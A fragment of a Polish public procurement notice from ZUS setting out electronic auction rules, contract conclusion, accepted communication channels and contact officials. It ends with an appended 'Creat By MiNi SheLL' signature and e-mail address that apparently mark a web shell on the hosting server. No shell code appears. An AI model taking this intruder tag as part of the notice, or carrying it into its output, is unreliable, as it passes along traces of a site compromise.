<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Po zamknięciu licytacji automatycznie Wykonawca, który zaoferował najkorzystniejsze postąpienie w dół zostanie uwidoczniony na stronie platformy licytacyjnej https://licytacje.uzp.gov.pl jako zwycięzca licytacji. Informacja ta zostanie następnie zamieszczona również na stronie internetowej Zamawiającego: www.zus.pl 
2.	Zamawiający niezwłocznie powiadomi Wykonawcę, który zaoferował najkorzystniejsze postąpienie cenowe 
o miejscu i terminie zawarcia umowy.
3.	Termin zawarcia umowy zostanie ustalony zgodnie z treścią art. 94 ustawy Prawo zamówień publicznych, 
z zastrzeżeniem art. 183 uPzp.
4.	Do momentu otwarcia licytacji elektronicznej dopuszcza się by oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazywali faksem. Zawsze dopuszczalna jest forma pisemna. Każda ze Stron na żądanie drugiej winna niezwłocznie potwierdzić fakt otrzymania faksu. Numer faksu Zamawiającego: 
42 638 26 65. 
5.	Wszelkie wnioski, oświadczenia, zawiadomienia i informacje przesłane faksem uważa się za złożone po terminie, jeśli ich treść nie dotarła do adresata przed upływem terminu.
6.	Zamawiający przekazuje zakwalifikowanym Wykonawcom zaproszenie do udziału w licytacji elektronicznej. Zaproszenie zostanie przesłane na numer faksu wskazany we Wniosku o dopuszczenie do udziału w licytacji elektronicznej lub w przypadku braku faksu na podany we Wniosku adres e-mail. Treść zaproszenia zawierać będzie adres strony internetowej, na której odbędzie się licytacja i parametry licytacji elektronicznej, tj. datę 
i godzinę otwarcia, czas trwania i warunki zamknięcia licytacji.
7.	Do momentu otwarcia licytacji elektronicznej forma pisemna zastrzeżona jest dla złożenia wniosku 
o dopuszczenie do udziału w licytacji elektronicznej wraz z załącznikami w tym oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.
8.	Do momentu otwarcia licytacji elektronicznej forma elektroniczna jest dopuszczalna jedynie:
8.1. na wniosek Wykonawcy - wyłącznie w zakresie przekazywania przez Zamawiającego Instrukcji dla Wykonawców, oświadczeń, wniosków, zawiadomień, zaproszenia do udziału w licytacji elektronicznej oraz informacji przez niego sporządzonych; w tym przypadku Wykonawca na żądanie Zamawiającego zobowiązany jest do niezwłocznego potwierdzenia faktu ich otrzymania;
8.2.  w zakresie przesyłania odwołania Zamawiającemu. 
Adres e-mailowy Zamawiającego: zusolodz@poczta.internetdsl.pl
9.	Od momentu otwarcia do momentu zamknięcia licytacji wszelkiego rodzaju wnioski, oświadczenia i inne informacje Zamawiający i Wykonawcy przekazują wyłącznie drogą elektroniczną za pośrednictwem platformy licytacyjnej.
10.	Ofertę w toku licytacji elektronicznej składa się w postaci elektronicznej.
11.	Osoby uprawnione do porozumiewania się z Wykonawcami:
Pani Beata Sujka, tel. 42/ 638 22 67,
Pani Iwona Nejman-Głodowska, tel. 42/ 638 25 18, 
faks  42/ 638 26 65.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com